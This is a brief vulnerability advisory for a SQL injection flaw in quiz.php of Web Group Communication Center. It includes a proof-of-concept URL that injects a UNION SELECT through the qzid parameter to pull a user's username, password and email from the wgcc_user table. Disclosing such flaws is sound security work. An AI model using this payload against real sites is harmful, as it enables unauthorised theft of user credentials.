Web Group Communication Center Quiz.PHP SQL Injection Vulnerability

Web Group Communication Center Quiz.PHP SQL Injection Vulnerability

An attacker can exploit this issue via a web client.

The following proof of concept is available:

http://www.example.com/quiz.php?action=show&qzid=-1%20union%20select%200,0,0,0,username,passwort,email,0,0,0,0,0,0,0,0%20from%20wgcc_user%20where%20userid=1